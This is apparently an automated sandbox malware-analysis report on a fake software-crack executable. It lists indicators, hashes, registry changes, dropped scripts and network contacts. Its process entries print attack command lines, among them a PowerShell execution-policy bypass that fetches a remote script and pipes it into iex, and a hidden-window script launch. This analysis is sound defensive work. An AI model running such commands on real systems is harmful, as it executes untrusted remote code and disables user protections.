File name:

IDM_6.4x_Crack_v20.4.exe

Full analysis: https://app.any.run/tasks/f31d5cc6-8a8a-4e78-b055-36a86edec54c
Verdict: Malicious activity
Analysis date: August 04, 2025, 06:19:21
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
github
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 3 sections
MD5:

13955B600A8D1AA1FFF5A805821259E4

SHA1:

D86601200FD2CB55D49642BD96DEF60C9B0957ED

SHA256:

F25CFF1EEA2EE2C4001905405D674E7B7E9050A554B67A390B2777AE71A4850B

SSDEEP:

1536:je+j44XYSLfuscW+yZELir92ZmyjvGVqRC4tPdUqEzGAV:je+04Xv2WtELir9uyqRJNdSzGAV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 1944)

    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 1944)

    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 1944)

    • Deletes a file (SCRIPT)

      • wscript.exe (PID: 1944)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7044)
      • powershell.exe (PID: 1040)
      • powershell.exe (PID: 1160)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1160)

    • Changes powershell execution policy (Bypass)

      • IDM_6.4x_Crack_v20.4.exe (PID: 1028)
      • powershell.exe (PID: 7044)

    • Modifies registry (POWERSHELL)

      • powershell.exe (PID: 7044)

    • Starts Visual C# compiler

      • powershell.exe (PID: 1040)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 1040)

  • SUSPICIOUS

    • The process executes VB scripts

      • IDM_6.4x_Crack_v20.4.exe (PID: 1028)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 1944)

    • Sets XML DOM element text (SCRIPT)

      • wscript.exe (PID: 1944)

    • Adds, changes, or deletes HTTP request header (SCRIPT)

      • wscript.exe (PID: 1944)

    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 1944)

    • Executing commands from a ".bat" file

      • IDM_6.4x_Crack_v20.4.exe (PID: 1028)
      • cmd.exe (PID: 2808)

    • Starts CMD.EXE for commands execution

      • IDM_6.4x_Crack_v20.4.exe (PID: 1028)
      • cmd.exe (PID: 2808)
      • cmd.exe (PID: 5236)
      • powershell.exe (PID: 1160)
      • cmd.exe (PID: 5528)
      • cmd.exe (PID: 3768)
      • cmd.exe (PID: 2348)
      • cmd.exe (PID: 5248)
      • cmd.exe (PID: 3556)

    • Uses REG/REGEDIT.EXE to modify registry

      • IDM_6.4x_Crack_v20.4.exe (PID: 1028)
      • cmd.exe (PID: 3960)
      • cmd.exe (PID: 2808)
      • cmd.exe (PID: 2348)

    • Application launched itself

      • cmd.exe (PID: 2808)
      • cmd.exe (PID: 5236)
      • powershell.exe (PID: 7044)
      • cmd.exe (PID: 2348)
      • cmd.exe (PID: 3768)
      • cmd.exe (PID: 3556)
      • cmd.exe (PID: 5248)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 2808)
      • IDM_6.4x_Crack_v20.4.exe (PID: 1028)
      • cmd.exe (PID: 3620)
      • cmd.exe (PID: 6724)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 2808)
      • IDM_6.4x_Crack_v20.4.exe (PID: 1028)
      • powershell.exe (PID: 7044)
      • cmd.exe (PID: 5684)
      • cmd.exe (PID: 5372)
      • cmd.exe (PID: 3620)
      • cmd.exe (PID: 6724)

    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 2808)
      • cmd.exe (PID: 3620)
      • cmd.exe (PID: 6724)

    • Reads security settings of Internet Explorer

      • IDM_6.4x_Crack_v20.4.exe (PID: 1028)

    • The process bypasses the loading of PowerShell profile settings

      • IDM_6.4x_Crack_v20.4.exe (PID: 1028)
      • powershell.exe (PID: 7044)
      • cmd.exe (PID: 3620)
      • cmd.exe (PID: 6724)

    • The process hides Powershell's copyright startup banner

      • IDM_6.4x_Crack_v20.4.exe (PID: 1028)
      • powershell.exe (PID: 7044)

    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 7044)

    • The process executes Powershell scripts

      • powershell.exe (PID: 7044)
      • IDM_6.4x_Crack_v20.4.exe (PID: 1028)

    • Hides command output

      • cmd.exe (PID: 5684)
      • cmd.exe (PID: 3960)
      • cmd.exe (PID: 3620)
      • cmd.exe (PID: 6724)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 7044)
      • powershell.exe (PID: 1160)

    • Creates a directory (POWERSHELL)

      • powershell.exe (PID: 1040)

    • Checks a user's role membership (POWERSHELL)

      • powershell.exe (PID: 1040)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 2492)

    • Uses .NET C# to load dll

      • powershell.exe (PID: 1040)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 1040)
      • powershell.exe (PID: 1160)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 2124)

    • Starts application with an unusual extension

      • cmd.exe (PID: 2808)

    • Executable content was dropped or overwritten

      • csc.exe (PID: 2492)

    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 1160)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 2124)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1160)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 2124)

    • Creates new GUID (POWERSHELL)

      • powershell.exe (PID: 1160)

    • Executing commands from ".cmd" file

      • powershell.exe (PID: 1160)
      • cmd.exe (PID: 5528)
      • cmd.exe (PID: 2348)
      • cmd.exe (PID: 3556)

    • Windows service management via SC.EXE

      • sc.exe (PID: 6724)
      • sc.exe (PID: 6368)

    • Starts SC.EXE for service management

      • cmd.exe (PID: 2348)
      • cmd.exe (PID: 3556)

    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 2348)
      • cmd.exe (PID: 3556)

    • Executes script without checking the security policy

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 2124)

  • INFO

    • Reads the computer name

      • IDM_6.4x_Crack_v20.4.exe (PID: 1028)

    • Checks supported languages

      • IDM_6.4x_Crack_v20.4.exe (PID: 1028)
      • csc.exe (PID: 2492)
      • cvtres.exe (PID: 3756)
      • chcp.com (PID: 6208)
      • mode.com (PID: 4580)
      • mode.com (PID: 1576)
      • mode.com (PID: 4124)

    • Create files in a temporary directory

      • IDM_6.4x_Crack_v20.4.exe (PID: 1028)
      • reg.exe (PID: 6384)
      • csc.exe (PID: 2492)
      • cvtres.exe (PID: 3756)

    • Creates files or folders in the user directory

      • IDM_6.4x_Crack_v20.4.exe (PID: 1028)

    • Checks proxy server information

      • wscript.exe (PID: 1944)
      • powershell.exe (PID: 7044)
      • powershell.exe (PID: 1040)
      • powershell.exe (PID: 1160)
      • slui.exe (PID: 6724)

    • Checks operating system version

      • cmd.exe (PID: 2808)
      • cmd.exe (PID: 2348)
      • cmd.exe (PID: 3556)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 5960)
      • powershell.exe (PID: 7044)
      • powershell.exe (PID: 4024)
      • powershell.exe (PID: 1160)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 2124)

    • Process checks computer location settings

      • IDM_6.4x_Crack_v20.4.exe (PID: 1028)

    • Disables trace logs

      • powershell.exe (PID: 7044)
      • powershell.exe (PID: 1160)
      • powershell.exe (PID: 1040)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 7044)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 1040)

    • Creates a byte array (POWERSHELL)

      • powershell.exe (PID: 1160)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 2124)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 1160)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 2124)

    • Reads the machine GUID from the registry

      • csc.exe (PID: 2492)

    • Changes the display of characters in the console

      • cmd.exe (PID: 2808)

    • Reads mouse settings

      • powershell.exe (PID: 1040)

    • Starts MODE.COM to configure console settings

      • mode.com (PID: 4580)
      • mode.com (PID: 1576)
      • mode.com (PID: 4124)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1040)

    • Reads the software policy settings

      • slui.exe (PID: 6724)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.dll | Win32 Dynamic Link Library (generic) (38.3)
.exe | Win32 Executable (generic) (26.2)
.exe | Win16/32 Executable Delphi generic (12)
.exe | Generic Win/DOS Executable (11.6)
.exe | DOS Executable Generic (11.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 1992:06:19 22:22:17+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, Bytes reversed lo, 32-bit, Bytes reversed hi
PEType: PE32
LinkerVersion: 2.25
CodeSize: 61440
InitializedDataSize: 8192
UninitializedDataSize: 188416
EntryPoint: 0x3d2b0
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
270
Monitored processes
128
Malicious processes
10
Suspicious processes
5

Behavior graph

Click at the process to see the details
start idm_6.4x_crack_v20.4.exe wscript.exe reg.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs reg.exe no specs find.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs find.exe no specs powershell.exe no specs find.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs find.exe no specs cmd.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs cmd.exe no specs reg.exe no specs cmd.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs cmd.exe no specs powershell.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs chcp.com no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs find.exe no specs findstr.exe no specs cmd.exe no specs reg.exe no specs find.exe no specs cmd.exe no specs find.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs find.exe no specs fltmc.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs mode.com no specs reg.exe no specs find.exe no specs reg.exe no specs cmd.exe no specs reg.exe no specs conhost.exe no specs conhost.exe no specs sc.exe no specs find.exe no specs findstr.exe no specs cmd.exe no specs find.exe no specs cmd.exe no specs reg.exe no specs find.exe no specs cmd.exe no specs find.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs find.exe no specs fltmc.exe no specs cmd.exe no specs powershell.exe no specs tiworker.exe no specs cmd.exe no specs mode.com no specs cmd.exe no specs ping.exe no specs cmd.exe no specs ping.exe no specs cmd.exe no specs find.exe no specs cmd.exe no specs find.exe no specs cmd.exe no specs reg.exe no specs mode.com no specs choice.exe no specs slui.exe svchost.exe idm_6.4x_crack_v20.4.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
472find /i "ARM64" C:\Windows\System32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Find String (grep) Utility
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\find.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
620reg query "HKU\S-1-5-21-1693682860-607145093-2874071422-1001\Software\DownloadManager" /v ExePath C:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
768find /i "0x0" C:\Windows\System32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Find String (grep) Utility
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\find.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
1028"C:\Users\admin\AppData\Local\Temp\IDM_6.4x_Crack_v20.4.exe" C:\Users\admin\AppData\Local\Temp\IDM_6.4x_Crack_v20.4.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\users\admin\appdata\local\temp\idm_6.4x_crack_v20.4.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll
1040"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -NoLogo -Command "irm https://christitus.com/win | iex"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
IDM_6.4x_Crack_v20.4.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
1160"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -NoLogo -WindowStyle Hidden -File "C:\Users\admin\AppData\Local\Temp\MAS_AIO_WIN.ps1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
1232reg add HKCU\Console /v QuickEdit /t REG_DWORD /d 0 /f C:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
1496ping -n 1 updatecheck34.activated.winC:\Windows\System32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
1520reg query HKU\S-1-5-21-1693682860-607145093-2874071422-1001\Software C:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1576mode conC:\Windows\System32\mode.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
DOS Device MODE Utility
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mode.com
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
Total events
68 396
Read events
68 338
Write events
43
Delete events
15

Modification events

(PID) Process:(1028) IDM_6.4x_Crack_v20.4.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script Host\Settings
Operation:writeName:Enabled
Value:
1
(PID) Process:(1028) IDM_6.4x_Crack_v20.4.exeKey:HKEY_CURRENT_USER\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings
Operation:writeName:Enabled
Value:
1
(PID) Process:(1028) IDM_6.4x_Crack_v20.4.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Script Host\Settings
Operation:writeName:Enabled
Value:
1
(PID) Process:(1028) IDM_6.4x_Crack_v20.4.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:DisableRegistryTools
Value:
0
(PID) Process:(1028) IDM_6.4x_Crack_v20.4.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:DisableCMD
Value:
0
(PID) Process:(1028) IDM_6.4x_Crack_v20.4.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:DisableTaskMgr
Value:
0
(PID) Process:(1028) IDM_6.4x_Crack_v20.4.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
Operation:writeName:NoRun
Value:
0
(PID) Process:(1028) IDM_6.4x_Crack_v20.4.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
Operation:writeName:DisallowRun
Value:
0
(PID) Process:(1028) IDM_6.4x_Crack_v20.4.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell
Operation:writeName:EnableScripts
Value:
1
(PID) Process:(1028) IDM_6.4x_Crack_v20.4.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\PowerShell\1\ShellIds\ScriptedDiagnostics
Operation:writeName:ExecutionPolicy
Value:
Bypass
Executable files
1
Suspicious files
16
Text files
40
Unknown types
0

Dropped files

PID
Process
Filename
Type
1028IDM_6.4x_Crack_v20.4.exeC:\Users\admin\AppData\Local\Temp\CRK_UPDT.vbstext
MD5:B91C1157D6F1E605CC965D092551B307
SHA256:92FE72CCEB630C7EFF3B2D3BED9C6969F53E5B9DFF1F481888754E59B3C76AB7
7044powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yyhrmrbb.1h0.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1944wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8binary
MD5:1FBB37F79B317A9A248E7C4CE4F5BAC5
SHA256:9BF639C595FE335B6F694EE35990BEFD2123F5E07FD1973FF619E3FC88F5F49F
1028IDM_6.4x_Crack_v20.4.exeC:\Users\admin\AppData\Local\Temp\IDM_UPDT.vbstext
MD5:B91C1157D6F1E605CC965D092551B307
SHA256:92FE72CCEB630C7EFF3B2D3BED9C6969F53E5B9DFF1F481888754E59B3C76AB7
1944wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8binary
MD5:121E517EB6EF7D8C1BB3928DF4244184
SHA256:08D99ABF45C21F8DA6578021C2EB861F931D2C074E941530E6CF6EC66CA0CAB8
1028IDM_6.4x_Crack_v20.4.exeC:\Users\admin\AppData\Local\Temp\BATCLEN.battext
MD5:9FE22C4AD624881F8F0977CC7614346F
SHA256:12B47C1949CC555C2F68F9FD4677ED5266F25C4DA4630BEC36E303629B133225
1944wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12binary
MD5:0720EB1C58785045C1B5095279CD6EE5
SHA256:88ADBCE4498CF890B7B5506CA5F375C4529564108DC40549BA43D3753F63E89A
1944wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12binary
MD5:CA8A9BDCA7AD59F5C8B7E1AA63160039
SHA256:81B7FA53B692B4D26E2E8943F2DDA2F9563CFCB0E11F48679EB2BE4F8C375B90
5960powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_m2g0dhqm.p0y.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5960powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lgzjph3d.iny.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
36
DNS requests
32
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1944
wscript.exe
GET
200
142.250.184.195:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
1944
wscript.exe
GET
200
142.250.184.195:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
3092
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1268
svchost.exe
GET
200
23.216.77.6:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4088
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4088
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
2940
svchost.exe
GET
200
69.192.161.44:80
http://x1.c.lencr.org/
unknown
whitelisted
3112
backgroundTaskHost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1268
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
7032
RUXIMICS.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1944
wscript.exe
188.114.97.3:443
idm.0dy.ir
CLOUDFLARENET
NL
unknown
1944
wscript.exe
142.250.184.195:80
c.pki.goog
GOOGLE
US
whitelisted
4
System
192.168.100.255:138
whitelisted
3092
svchost.exe
40.126.31.131:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3092
svchost.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
1268
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 4.231.128.59
  • 40.127.240.158
whitelisted
google.com
  • 142.250.184.206
whitelisted
idm.0dy.ir
  • 188.114.97.3
  • 188.114.96.3
unknown
c.pki.goog
  • 142.250.184.195
whitelisted
login.live.com
  • 40.126.31.131
  • 40.126.31.129
  • 20.190.159.131
  • 20.190.159.130
  • 40.126.31.69
  • 40.126.31.3
  • 40.126.31.73
  • 20.190.159.0
  • 40.126.31.130
  • 20.190.159.128
  • 20.190.159.64
  • 40.126.31.67
  • 20.190.159.71
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
crl.microsoft.com
  • 23.216.77.6
  • 23.216.77.20
  • 23.216.77.28
  • 23.216.77.42
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
get-activated-win.translate.goog
  • 142.250.186.33
whitelisted
christitus.com
  • 104.26.2.223
  • 104.26.3.223
  • 172.67.70.188
malicious

Threats

PID
Process
Class
Message
2200
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access release user assets on GitHub
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
IDM_6.4x_Crack_v20.4.exe